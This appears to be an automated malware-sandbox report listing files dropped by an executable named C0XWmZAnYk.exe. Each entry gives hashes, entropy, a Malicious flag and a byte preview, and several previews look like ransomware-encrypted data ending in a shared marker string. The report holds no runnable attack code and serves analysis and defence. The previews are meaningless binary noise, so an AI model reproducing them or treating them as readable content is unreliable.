              SHA-512:F785630E2FC8A01958A9A078C978F8195201AB0E285981841939A556A3E7098498A573428AC49E67E7DB8DA748F16857680E0699B8448431F045E483231492D1
              Malicious:false
              Preview:(()=>.l.$.r...rM.(...y&.\..mh....qd.9D...kBao6=.(I&CT.g?I.....<.i.v+fS..*.P.OB[.....m..........[...7:b1%q.i.....u'B.........O.Y......p......\T...... B:.5i..7yQ4.8d`...U[...Ls;w.9..%..2|.q.9.^....~....Z.....0x4X1..ne.t.!.<M.'.wk...r.7..=>.4...S.b.......hz.!.@:...7IZC....=d.I.Y....-..u..T........."D?.l2G..lZ..`.g.7<|....O.H...".!.BD.!O7v.\!.+.C.......P.)......W..~..+...1....<z....xhp..j.C....@....g.u.yfo...8O..Y.J6!.Z.g..8#k..`./t..ZN..r.t...:.V...I...am...p....9..v.....t.}BN...........+.8Q.......P..PN...3.E.4jQ.k."F'v......d..N....~..Z...:/....)1$W.$q..m..i.....W.~...[t..<...{..EdF..../p........%:...^5..$.^..H.~%."..r.m....T....Xw..I_N%...NM].%u'CS.Z..z...k.3.&.+txH.1jd../:4.g..Q..jy....:.W.....'.&..$......L...}6..n..h..{u0,.Z.V......._Bg,...88..3...R'>H.....Q.o...O.80...._....H.M..._.1.!..5...@....8....l...!x.G.4..D|G...|..H...........Dc....&..piT.6.k[._.l.e-.....h.V..Q..........#.....Y$......^l=e7.6.l5......}T..........M)..e.s...t.q
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358109
              Entropy (8bit):7.386570350103092
              Encrypted:false
              SSDEEP:6144:ytAWrzWuSYKjr+TcoCqicIfLOqtFS4pc8Yv7fX7cxbAB0uZ:ajSjyAlc0LsHIza
              MD5:62D19A881C13B732BE9D5F6B6DEA7C9B
              SHA1:C9ACE1DC0D9660CFE8054591E8D51C950AE2D573
              SHA-256:D34A91BEE182440AE370FFE59A2F96ADE492DBD98B69418D2744DD1958E7C3B2
              SHA-512:C16084780B9B21382E330EA900B3714C7CE7E1104D345023A393F515EEF436B447E7E62B1F5B666A2D9D4947603C52409EC02F1C12C664AA5F489056DEBCAFAE
              Malicious:false
              Preview:!func.S..5U..&.....O..p..M1l9.S.. ._.J....b}<.\.2."C.F...i.Y..6.....5..i..9<7... ).......M.6.....C..P.d....V.|....4..c.....O........#.ao..p..M9....MI..2.E...RI{*...`...-?.}..._.B..{?."<y`.....w_eO..h(.w........D...u.h/.. sj.....%.[.......&.-........Jg.........#...r....s...7DM..G.Ft....*kP.+v..._y.!.k..!4.&..os.*c....?o?...}:L[.7\..[.......MV..D,....H.8Qi...{.T6|...)...x..9..k.....N~.e.....%.=SE>..;2.Yv....+..s......$.=.c...'.....<..i.c.f..bS.W./....J@..........R...`#.H.....De.7...~.......nKS)...[....0-...V..8.aQ..Y..QcP..F...vj].0....4.u2.4...S...A...|'.l.,.v.w...>!.^.....l.ZG...).p...tE.Q._.M.+.J........?..,....A.un5...._IQ...Du..........t....!.........g..LQ<.E.....2h_'..;..^...6.5_fK...@F<E.%..9p...|..T.....%.....l..b..L\-...)\.:[..?j..C...........2x...T..7.%S.....%...@6......G...7.>?......5.M5).36.W.q.53..A.J....>..\q.[.9{...@.o..........t0....`t..c......ui/.G.>|.y..).Z*.a...H.....dZ...S,...uJ....8.k..................c
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1179282
              Entropy (8bit):6.2608996901444485
              Encrypted:false
              SSDEEP:12288:mATXyVgLWIKAMjTdoxK856sJmOBjn2LT8/XH6rewfkb3J0sId:mAOVOWdjTdoncamOB6LT8/bR3esId
              MD5:CB94884D146F4F6DC08ED2100749108C
              SHA1:902297A3A2C81876739EDBFCCFD7084A4E1A2926
              SHA-256:588BBE1A11A9775EAA0156C6172DF89E7C2EDEF3FDAF7D8BE1B8BFD6A02B8846
              SHA-512:283E4E5D211BCD971C634BCD5729AC41F79B102526F8E6D47FD2BB6B03D1EAF7B27DDACADD1A71AC0A600B2F91D7F15830F22554CD3DBA4B674998FCDD050E90
              Malicious:false
              Preview:/*! F......!.....J...-.pZ..V...s..zGB........=...He..jd....f...J.G6..S5..U...;....4...n.F....a...)P\.>i,.....{iKB3K.*n....{.V....E................h.......qT.c..(..rZ..)........xS...U.......s....W..R.@..o..y..0...TT.53E..8..|..6.3X.Iy....:.&..8..[)....6..x...&............v!.k.(...59.2~./c8^/.^1t._/-...$<.B.v..d......}..tc'.9.>.hipj..A..\.....S.x....cr...].q.L...7.0z.f......+]&.Xt.B..,..L...L..[.t.....`..;..4V...d.^.e3.w...R....X1..N.64.t.r.G&e...jh1Y.Ax.O^.j./..f..........@8N.5]ta.<OP..;~9N.V....c+...Q....O$..l.;L..$._".Mr.'qH..M.=.J[..>yo.Vq.w..s0.y...\.:..-p?...5t|....&..k.Z..]...#y..(<.DY..........n...p...O_.....\.1..3.@...C..$...q..l8.K..Ey.i2..u.n%CTE....v.f@5*.;7...#DZ$......4a...u6..!I.V.S.(]v......r...#Q..X...,v.s_..lG...9..w......$.Py.p$......s..{..[d....%..`e..~...I..y6D....;6......r."...imqVFp. 0.g....<...-......k#..6.K.4ZK..S..G...D..5..........E.~.....)Ie8f"....O.Ok....-/...t.>...e._.....jK.N..a=.7.p.....6.k+...~.S;7....,)
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1010732
              Entropy (8bit):6.3586172931675655
              Encrypted:false
              SSDEEP:12288:nsYbPDVH9qPW1kbi+KwEL9X2Y+zWZdnwijDWwMxdf6kY:7DJYei1gRmY+zWZWijDWF6P
              MD5:4D58E6EDE59106A87D19FC1F14101477
              SHA1:588A80A05451FD5C5E8E3E8D5F154367D275CA8A
              SHA-256:3905733808C9ABD10D0E62DE90958F0B0ED736FEC4409569F46D34FB1D2F486E
              SHA-512:18A0ABB6E79FC58A3E7FE0D867E1F1B2882D08649D933F0F79C004810D2091D0FFEB07DC75C40FB428496035617F5C0DE1F068A0CF9D8833F45061160CA3F88B
              Malicious:false
              Preview:/*! F.p.8\;.}F.r.....r.5...[...&|/m.....lsP.k.%U...n2o'..$.Z._.8...g.I..J........D..._)X...v..<..5.<.c#x.....j.?L..d....1...5c.y.y..P.........o.{.....J.O.(0..2..X.......}.6)..x.$...X.=-..7..Em..">.....l....y.@ Q.ud0..]...Q....x......I|..F.d.....x...3.q........hV ..1..Q.....Sur.n.....K.o#...|..9d...........=.`.\~k.".....WD...l/..C...]..2.6.9.....G...d.L...y<8<@.z........I.tL.../c...m.e.|.5.h./.8n...[....iP.<......Em....p|.1.%h..1........B.."..]..v\M.%.|..B.C..9c...GI.#.......<...[..:Ed.$s..z.h.</..U@.q(....L.....D.<D:g,....m$.\a-..8K...5......T...8V]GYT<;`......*.....D...x.|.I.P..c.#...X=P...4of.....'9.ja...=.0.H..yy.%.4!.f..zm.9#.>.)(.wr.2?....-...oI7..;J.h.-...`..dS.W.Y......R'L....t....X.}.z.r.......?.h....6Q+g.+.....S.lVt.D..h.H....B."L.[....N....(|...(3Y.|.T...?.x..%........y.=S.....j.f@K]...N....$..>1..b.."!2rT..u.PH.....qCT..i..<L........CJ..8......D...7...p..(~k..xY(......(i.U.m.{l{.{/..h..sL[?e...9.......&~Z./).T....]....uR.2(..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1042237
              Entropy (8bit):6.3378321815946
              Encrypted:false
              SSDEEP:12288:TiSGwC33LnetNPr9QLhbGoHVMunRZm91a9I2SFn4a7:TiSGwC3bYyt6oH2SZm91jFx
              MD5:AA929E7A6E943FF8993D9AD533ACF41D
              SHA1:D2E8A2FE045F828582AF9E38EDDB2A61CF7147E3
              SHA-256:56A944A2B7DE29A4D35F9C85F3F653442C10D689702BEA89871FF840C36A6E79
              SHA-512:BFDF571D915DB38B415886EADD6F0DB6D05F2928725DC3AB64D2BD4A9318071E69F522761D2922205227B052958AF04649ED780CDB8C865A7BFF4EDCFC75EBC7
              Malicious:false
              Preview:/*! FIf........2.k{....,.3.f.[...@...;.....=....,....p.N.......O^.9)z..q..^.>:.}Df.\.z...X.`.%i...S....w...!C+...e.>.i....p..G.[\.v....e{.'1KJ............ q.rk.V.y...t...Lc.qx......ne.h.[5K...=.0.m......R...<.xj.Pp.-r...HX3...7..R.....bE.k.....q.\D|........7.........TXjT.._#.....S..a..L.....6WvZ.R.....x'....g.*.......m.:.y+..=..a......A...V:..R.:....:.........,j.....D(..?..7....A.Wp...*..i.u.1.].....z.#.....$...2Nx..$.S..&!.<.`.q4...O.U.....K.f..(.;.x.L-:..A....S.u..=K.......B.".d!..<.N.j..1..&.o4.[..G......o..2..d.3?......1(.m......I......_K.@.L5..;xAR...9dU.2...V...U-.......{....2#.r..K..D....m.".4.y......n.[......5?RC...L....~....S{........Y.!.I$p.C.........l...g..p..S.W.".;`K/U...]WN...>C.$.T.zn!>..,.ij.mz./B..`..#;.w.......<3......A'..>r.ru...b..d...;..8........uh.y....,...<f.8....."..f.xfNp.Sy?...2......'x.\..w..z.......X.M.".....v.O..&.-._l...n..pQ.L.....{0.P.-.f$..s.A..&.....x+...s0a.wR6..AIG.j}.......d7..;..I.%1.....]...HA.qe....#.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1681049
              Entropy (8bit):6.109576944263275
              Encrypted:false
              SSDEEP:24576:PeccmwD1LYkVrB6WpJHdeL4rULhIvRbMwvoutonW:VGDhYkVrB6WpJHdVrULhIvRbMwvouN
              MD5:0B00F2AA70B3DD679197122A8D24B887
              SHA1:241DA3DF44555CDBE2E0A2BFDBB7D72DB073D12F
              SHA-256:084BFDDD6D18432AB8DBF2047752E2430756CE425D80686C151912F45F83EF1F
              SHA-512:72EA089696DBFA048BFC71CAC4D5FBB36EFC175E6D6F627CE68031CC259656411D75EF408BD471A26B07216DEA818CD451007EB497463CAE2518D0CC56440B1C
              Malicious:false
              Preview:/*! F.@..|[U'.....E.....X.z.F........L..kB..............rz`*V..U?..a.YK....\....&.[.g.Tk.E.Ydr..,.....-....6.......7...G<.h4.K.^u..Gj..0.0"...Q4.p....f..u0.......MzmB...?..K.Ll......Q.a...) ZI ....Z&O..i+I..T.#xQ9*/...D.=>..h.,B.ar...........N5..w...OT. .1...>..4W*'b.cQj.7.d..?....H......SR.J.....$8:...Y..-c.P.Gk8e+.7....B..m.=......>..i.47....U.<....b0}.....R...F....\M5.p.+.(...8s.<NG.EV*........z....P.....=R. .F&.....K.4......De.d.BG...Y/..QP.g......vB.$..(....J.O....E...0N|..y..1.....DId..^T.5..8\...V....q......k.......!CJ.}.($.P..3..Zj.x2...}.H<.s..3..0L._..l..Z..]........S......d%..8..pWo|;[b'....@%i.R(..Z....Q...,.^~Q..7T.c#.&:Q.G3.?....5{.......#...1.....W.0 .B-.~-&8Ie...<....=.|.6JS........AZ.......-...E(.....%.B.....8}.@mGt.[...R..'v....V..o...O.`.....&9x}....O...0.V-.x.S.".\.~T..........:..k......?v....j..PJ.0y......[d....E.lA.Q<._.$..e...-!oC.<...T.U........?]..H......}C...........=u#......:...c....z....'H'..R#S..q...+.Q.t@...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):80121
              Entropy (8bit):7.9978503969358785
              Encrypted:true
              SSDEEP:1536:T//+FE1iGztUVNfckHB5DCsEjz1comc0MYTf4H0ul88:zcEgGQNkkHn+5jPmcBYT9W5
              MD5:C60F7B5B5EA095E77017B8C704706287
              SHA1:6F8F5C4E09D4A15766A3A966CCFA9C2300ACA1D9
              SHA-256:7278C697AEF61E4A9DD418F0952A303CF45F888B5F46C4B1B80E527157C475B8
              SHA-512:D58CADEB62DB7C8BE90872A7780E944DB9D29C17247200EF5F5999A34B22324E08A0E1BB5E899D6BC8626BA704F3CDFD17581ADA9E1EEC831B5DB69C86691B35
              Malicious:true
              Preview:/*! F.._IxY....t...zV......J..=I.g..e5..~U.Xl.l{K.x.....e,...j.W.....7v*.H....7R38T..*.....4.%\.....V...~vc.r...7...($..h....!s....^L,.....{.T.o..Rh..5. }...>.e..*.5......[.f..?.}..8.Qaof./...Y..l.;.Is.\..[.....|~... >.|..]..6..4.#L....UI..U..t.w...9.....lh.....B/.]."....0e..i.'.d..0.E.)u7.z.X..........Ld.,3..{...<...4.N........."..pc..V..T?.8...Zc..5.|......%.%...N....L2.Rc...n......?M.....=@..p..[.2T@.nZ...HY.B4`. Q.P.)..TvCrS. .4+ya.!....\0M...)..[*.MT$..}.6r...v.',.Ma....#.......q..f..=....K.1.3...ro.'d....X.G.v...>...lpX......z...QMt..5..S./.8.....5.U.L..i...G`.#.....WM.. .H....(P../..Na~i.o...s...B.q^.X...!oo........1y.}....2.^...@)F..pT^.wa..@.....3._.e...W.eu...K1l..:..H.,.....*.x.[...Q.j.....z..Qp.0........77...qN*.....y7.beK...y....Yr....8.ns...Z7~..C..p.$.so....m......^.o.Z.{..........A....h..o.m0#....8G.-....$..^.t.......n2.SE...`...U...F"`.6P.._..f.ja.n.`......C1...W(..B..P._....h...2.~..,....V....|.V[.c.]s.l..k8.c.g(....W...p
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.3941354976822335
              Encrypted:false
              SSDEEP:12:lQC6P5QDUkR0DmHXWUUK4MKNzL3wTiZdxa3cii9a:n6MUo6mHzU1MKNXd+bD
              MD5:F4CD84F2078DE16DC11AE6104C402BF5
              SHA1:CD5920FD245C51361F3ADF3BD5E864279626FAB9
              SHA-256:B152C0D512FE94B74EFC21BE0B9B4442B4117621896292E6B57A310891585081
              SHA-512:7E9CDAB52BD54603579772C30E8D96563264EF4534C774358C475E5175681F60337B24B08A62727205467B1386330AF05F9570E6EDDE09F89E0D03BEEE2E7E52
              Malicious:false
              Preview:1.312...Q...T.6.~d......x@z.Smz. .....#<...J_<e......e...=..$..s....8..e4.b..f..qe....z.L...[.....}b..4g.kX.N.Z.....J.h.`.._.K..f7+K.[g-.......q.EK..W....L.0.......2,B.:..M./nw..........p.a.[.`.....=.......@)..#.a.,M..1.`.r..P..Jl.ul....0. ...Y.".f^T..Y.B....N.Y.Z..g...V.v".nL.;..._......H.g.52.t.nK&J.M..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):481
              Entropy (8bit):7.494764993641194
              Encrypted:false
              SSDEEP:12:MJ8puPNqB2Hq8YH2KKP4dn+IjhXhCrGwLdxa3cii9a:MNjwHd3jj0d+bD
              MD5:D27C23002BAAFA3D3427E5ECE5EDBBBB
              SHA1:1C2CD220A3519C699EF144BBFF663D9743055911
              SHA-256:C848D6FAD5B70238FAEEAEE6D135A12EB5B16CB6A98384C2E76675CAFF8FA517
              SHA-512:11A5481E7235DDBD6A1E95A1581591BEF385C53C35678E7117F5B15CB400A7BDCD48FDC49B18CBC3A53552144B5A869BBC604DB6759EACE1152AB5962CB6B795
              Malicious:false
              Preview:.{..&.--..}.....N..9*..P.>X. /.......q..tjJ..O*6.....})`..4.b..U.{q.`i.;..7.g@D$..+.<.m...5.'a+r.G..-.B..p(..Y.Ao....c.Z...Fl..O..`4.H.}P...3..U.Uv.A:...}.0H?.O.!G.b$P3V.c$8....db...F..........i.@.mxw....F...q....BY)F..#.~.....s.......1.,+...h..0O ..-.]=8<......K=s..pp.Y..........\.,..ZL..Y,C6... h.0...Q....p.g.-W..1..k....?O....;K...J.m.d..;J0X.[..S..^.d|.4.(!^n~.....-......../..E.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):988649
              Entropy (8bit):6.388996794508119
              Encrypted:false
              SSDEEP:12288:t62hef7e3+RgnzgY6E6GlsV7nNy9xX1cdKXxLM/:t6o/bzBllsVpy9xXmyL0
              MD5:BF063806B5689C9BAA38FFDD66E61E34
              SHA1:3670C821EE1541817FF7AC18827F6597A6DABC9C
              SHA-256:350E7CE53F2D7C0B63F7779B630488A92C0D8AC6B32FD6B0443A25D8B14F3715
              SHA-512:6F02079675EF6ECA04E5E1ECD97D3C273B480484F1E2F8D658F241854387CE8A77D0B218345968C86ABAFFB73E1C562A4B77D29B9B442B4468796F0D0E2D4481
              Malicious:false
              Preview:/*! F...[.........`M~f.._.q(+.].RR.....ZA`....F...V.V..aIw.62...;r.A_UR...m.....BM..{...F.:.....@C.....Ie......U(.=.........E.5q.8.a...F`,.....8...[.L..%Z.....aR.R...j............j...u.{...<.....Hz..c..V...C.!.l...%.Hy..1.?..../."8.+..f0!.wQ|.....\]..N?{.6.........].~.C#..hT..fh..eMw....y._|.......={?....[...@g....r6wW.n..8...j......R0....O. +B+.......RR.3.M...Q......37Q\.2..8..]..3..mx.v....z.qf...#8k[.......@.~...C5sG.z\..;.Rq...7......wA.0.s.i...G3.6._..`...}k...JY,rYV..._......VF.2..D...V.....V..c.^......a~.hA>~#u..j..A...(Xs;...\q7*.X..w...a6.z...n.......8.@.*q..BA....N]...D.b.......o....:.h..oa......F.d..z....J.J.D....S..yX.H..4...j.i..[...b...B.*.KN..Zn..1d....N../....A<.d..W.G..W.e.4.V!fj.y..F^.0.z.-9.??:..m,....z .Z.....+......7....LU.<E.?I{O%)..q.a.6*+.!..?[...x.E....j..>..**6.....s0.......jd.4.>..{.\.(4...b9.o.4.n..e*^?VG.?.x.8."..^.....j.h..m]..*...D.Q......n..y..YO.n......r[..b+.......ey.K_.g6.....z.....7..&....dhK......Az.t9v
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1679
              Entropy (8bit):7.885505001951983
              Encrypted:false
              SSDEEP:48:bBxn4ggOEJCHEZoJ2bUiq1x/V/nEr9eNEj8D:fn4ggbCHEeJqUxx/JnMeNb
              MD5:C7EA5E6A2B656225FF7294E60A48168F
              SHA1:D39EAEE4A22FD87AD332B0A56CBD6706C1FE537F
              SHA-256:37B60DBEBE37669527C8EEB6441A6990D4472A0D5AEDC1CC8BFD9C36DDE547A6
              SHA-512:173A850EB9C2884BCAFA6BD7C1935AD97C466A2CD8822E6C06F43FF5992AB21ECBB365429927C4DB5C8908055AC327F586871B9225D282002FCF5F1F869BC78D
              Malicious:false
              Preview:<htmlm.........&.G..>}.@...q|Et.e....v/...,.F....A.D<.R|.4)s}.pzs..8...t.......eR. |.G.Q.........4yG..9......I...[hY.@.......d.O.7..9...N$..;Z.-...0]qJ..~.1....q.d....N..m.P/w.[).A;W......G...%;.DM.Y....K.....v....G..X....~OZ..J.D).Y3.,....$.EQ].#.U>..@.U....&...D....1....mp..I.H..n.ujC..Q2..#..Hr<+f...f..P.,!W.D....D.#v_O...(......&4;VY...1 .5.u.se.-...)_p"3.;.'..ch......... .Bv.../)....tj.M.%....a..y%9T....,.h...O.Pc=Z..c+c....*...9...;.T....4.....h.....&W.Z.}..V.t4.m.wJ....+....i.@H..iS...P.?W...w@...."`cPG9... .._|.+$...;{&@.5# ..F.6....*..{.8.M+.F%...jD...L..b...j2..j.,~...,..mA...........6.@....tC......~....5.~.~#>&$=37..Y!k.LQ4j@....S.p.-........{....ih.p@...{.v. .bY.+.nI.....RN.2..$....W.......{...r....j....xt.A.F.r.......b...fN.I..X...|.9%Tg.z.......Wek.a.....I..t..Ya.{Q\....Uk..Dd...4f3...r=.O...KS.G.@_...X.w. k..P..F...]......i_.....??.S.&...yx.'..cR...;..!Y/.1.;....P.W..j.JwO,P..?m.n...2...GLx..v?....6.jA...G0c.,.d...Jf.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):5653603
              Entropy (8bit):5.667948441693145
              Encrypted:false
              SSDEEP:49152:Gusa/EMp4xtbEaX37/ORDsYon+shfiAm+1GbMnkI/Lp1m5aUIzyI3rm6pIepx4sS:GtHPpGbMnkJ5XmIqsTvB
              MD5:A6A3F7CCF3F0F03D9BD48CF8716076AC
              SHA1:5FEB0AC24D29793F3FFD18B0512EA5D14E15ECD0
              SHA-256:1175729F1CCFD221518B2B1E3D75454AA0F652747B42D8CED0B8463C84E53B09
              SHA-512:ED051C6520FF3639E8F40BB8E0359B070D7C0010149CDA6A15889CE5F90B38D5F19E13928CE86A5ECEB62493F3A04D879B0929E8065D30519D502F92EF65442F
              Malicious:false
              Preview:/*! F..p.tp.3.o..E...K.~J..pW1T..(qJ....$y.....g....Y.D=..O.UF..DPu......Z..+.-9=...Mu#&Y.P..V......@.D|.0.Q....s...Q.6M..|.jl{.c..*s_.N+x...iz.F9......_e...LCjk.o.WEI..?g3.3.e]&$q..E.ET.....+.>.xD<..kxT.....,..ZZ>[0...e`.U....."....J{.>...io;N.[..j.!.n....Y....BH.C(.....=....".K..v..E$...".............o.[...%.A..CA/...[.R...+...f.QbnQ...J.@~(2.ys...G..G>7...r.AS..;.....K.4ul.Hf.~L>.vu..s?..-.d...P|....].i.d=.ss:.&.Xh..'..,...;n.n..J.L......<w..t.|...fQ...pp...!j}q5..*e..\^yN...{I...|....'o..v....).A-d$Ee.,I......5 }............;......A...?....x...=.5n...a.m.C.@LW{.1.....-.~m.z..nh.V.Y:..1z?.G...dGw.....].,....6%..&...p..8...D.02.z....:4.?i.ch.~)A.<....Yn....L..b..q..c]% .e.;fbq/B]..(.!.2..i.....=..@..,.|I.It...j..+j...O..&......N..8v[.vD.L..WE..Lz..-m........*..u.{k"....5......P6.;.*..*9.").&.:..........L......)...../..V...|.wf{...`.l.MSjJP..}..M..Ew.....}....z...<l.5..8g.....2}....{."..<.+..3'}........2.'.i.W..P .)t.:gD..?..`.>_.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1473
              Entropy (8bit):7.858792845737571
              Encrypted:false
              SSDEEP:24:0V9sCQh7G+uINGCwocQGVusluVHIQDJq6RLtovbL2+IJwbXUwJQuZJzZb+g+0d+X:Q9sDFjuIvWVuz7JZcwqbkwdzA+8D
              MD5:97D3CDE858A54530B6A92A06CA563295
              SHA1:0B981F04D7A1D4B6906D3A0F69BB8668DF483D08
              SHA-256:FA9B9B8D26547420E025D3AA72AF5C16C9B94333A74AB00A853C5FA0C6554E9E
              SHA-512:3F62B2534C002D22B06B7DF1C31D14E71F9A0403AA90EB7274EC683D97A9F76E09E812180163AA54D6D8F78AB62B1147569C366868D6363DD1CDC2BE9377BB9D
              Malicious:false
              Preview:<html.....H.lN6........~._Qm5.^.Mm(..T..)........h...I.$(C...`..Wv.Q.lF..7.Ib..L...fD...U..Q.zE.O...'.J.k.d.......t....#.J..9.?..D...b.'R1...K...|.o.@._e........B.w............2M............H......NW.(..].2..3....`S.U!.&..6D.p.=...&.2i+..^...U.w.1lE.Wt:7opd8.N...&}c%.+....l.c}7.<9.5...02.X.(...Kj.w...W\&.;...x&=U3.=..EP.G...H.....=B..q..\.......s..>4=...Iy...j..,...&O\......k...~.8.n..X.Bkt..'."....h6p.<.....k.4.:..]$u.%|.-..j.1.C.P.bF..EH\A9l.[......Z.3n{.kD......K'..q?0X....xq...i..e+..$....G...S.R\-.BD......H.x.CgO.........[...8_..3.E.Q._...~...u1&...I.aba..X..P.uYg.o..G...K.=K...&...Wi.../.<.6.};v.Ki>..n......1_K@Y.'7:.L7.J.....6..e7%...:....*....:4...#*"..0.0\.x..P.e<...V..f.}....h,n.(.....bv.......P~..9...Ne..o.{....V.5m...p:L.}4...S$.'(...... I.1?8.....X|..=W0...n.E.!...=.p%.........o.i...q]...7.#.....2<@.q..dE..O?.'>...x^.\:N..uk.d..a0C R...Xh..b.....z_..a?.W..Q...U...>.HC..rp..).E.zn.r.#.s..AF..x...Zn...2k..VA.0}....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):12270
              Entropy (8bit):7.983288355499223
              Encrypted:false
              SSDEEP:192:wvQ4kHDk36Y+doLeOwm5GbTlP5oOSpKr1gW9QjX4Rydi8idv1SYXcOslJ9doBxLV:wo40ZTdkeOulPqOSpKr1gW9Qjoydi8if
              MD5:8474FFEAF03BDBF9918E0B41D89F6A17
              SHA1:DD8113553939FF95317EDEC8D94F2A3272F45C3D
              SHA-256:9585C509993BB5D5F265698BB7C89A17CF826E41BD0B6E718296DAA4951A6506
              SHA-512:1218B0592BCB42F71813C0D4AAE5EB460A5232947E0535F9A7A5FC171911007A2BF2688E983C3C15322B4645EDF986AA1A3200958AFB7FAC0A2F809A55F1D2C4
              Malicious:false
              Preview:(()=>.Tk.n..f.^.bh.1-.$...._....;..=......L.b..b...<...D....8..9c.../K...3@E..S.....#.g!.....2..D.]..m.b).M...-.......p.O.XV[...(|..<.L.$...c..B..,...:)$.gt..... ..3...(.'..g...`.r8...*..V.....u......t....!.:.Xh5..*7r......o..$..~.S...\`...v._..K<cu.).p.....@.A..o...D..P3z.I.d..;X...|.v...'.7.......E..L.7Y..n8..b.&...t.$..5Rv....R..6^.o...Ue...B?O.kN~6.....\......8.k.......}.\.` .j...;....D.hx.Lv.,....a....5....4?......C..n@0vX(.{1.uO.d.Ms.T...o.A..(..c....pI.2..DlA&.+..nLI.oT.....?...... .8.))..&...t........9o..-p&....GO......m.|N...\|W..N............:.^.w$BAUm.9P&t....W...79.K k....lZ..T....B........F...vCGt.k(039mq..~..v..+..G0B{..>...B.Tx.k......1S....B...*}.....Rk#.....1O.b..Q.3...f\U..El.f)..n.f7..'X...xS.VE....HO!.Kt...SC.KPX.f.....cP`}.fq.....,3.s.`.~wo.6I.....li.~....x<......-.g.A.p.Q$.%p..fA<S......|..3.-3...n...v..n!......n^4.[..`.....e..N.M.......2..~.~..'h..x...j8..6...N:.}[..pH..n.....I.s%....".p[.yt..%g.3....x.........
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358109
              Entropy (8bit):7.386956945720075
              Encrypted:false
              SSDEEP:6144:Rh4FIsR+7NqI6ipig9O1ugOqtFS4pc8Yv7fX7cxbAB0ur:XywRqP1ugsHIzc
              MD5:0020F36F4E2633744FEE314D1EC9732B
              SHA1:D018CE63DC34B0C2DCB9F80050B886F8A68003F1
              SHA-256:1C4B14B864CEF942F659F82DC8F6BFAE3FAF23D9A7CC07091DFA60135030FF70
              SHA-512:F0918E1C3308594831EED2C5E40439110E46A3A723D9DF7227E93581D6745C924110BC58FF56703A397F13995A96903A510AF7C17E774C4F68AF3095861B9D10
              Malicious:false
              Preview:!func,._o.Y..n\.>...'../.jV.Y.....y........ri5N./....Ll .t..C....E..g?=...f .....uPP....#.mcZ....O;)....~..W#Vf..{....S.........R..M8$r..c`.:...F.'.!..um..D%.?..H...P.f...'..XaG1o..(..&...f......~. z.x..m.u}..%`Q..k':.5..]...G.M.=...\..a...+`.p=`Q.k.7Dz.c........cjlJ.6.WaaF2x....}.....gV}j..4F4.T.zN.Ch0._.4..P|.../.l82O.c.@W.C.^)$..c9....{T....#-.F"(......=M.9......n[[.P~K~s.`.......'...5....=..=.\.$X....X..t...2..|.F........:U$U.....A'l.h.s.,.2..p.MU..y.P....37P...u.X;y...#n.w.M#a..T.f..J8..].>.x......k..+Y...6?........;...c.....6.9..(z3..-#i.Z.......$.BA.....mD..G>..hR.n.k....sD../N.r.C..:.|...5.....T'g.o.....:P.....H......S...>[..t...U...\w..V.-.2..k..N...J=.Vk.5...*a...r...|.O...H.).y.KK7~".......{$.r48..^...$..9v.y..........B.P......y...V...6.....i......i..B..G...b.}.|...P=.l._Hr[..Od6.J..hq8......&...$.\.t|F.z\8p..u.k\.3.i.#...1... M...b..\:...s..F...<....mG.VN...P.v.N.7...g......[.~{.......).X............^OX_......)+e..[..,.^.\.......<...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4605
              Entropy (8bit):7.9632857826530135
              Encrypted:false
              SSDEEP:96:CGrDMjqttft+PBWdh4ZMu436Rtn6c4t85POZ4cDPJG7ka78UPVNdGq:fMjSft+PBYh4Zu62vmPhosoa78UPPt
              MD5:067D87F2C0F9BC771F3AD6A05D264ED0
              SHA1:C78292DD3F175D9FB3F228B351991C8EE9CE305C
              SHA-256:8B1D6ABE1CA92E7E4BB50D9A0672605167398B1577117196E957E3AE70F48A38
              SHA-512:1E4B78DF38D8B2B16611BF059F7A38D8DD030B3F149F59A5FC73BAB1D409B7D43FE34095F162F6521F1A2408568E83AF358957F3A26A59D7FB18B61EC63FEB01
              Malicious:false
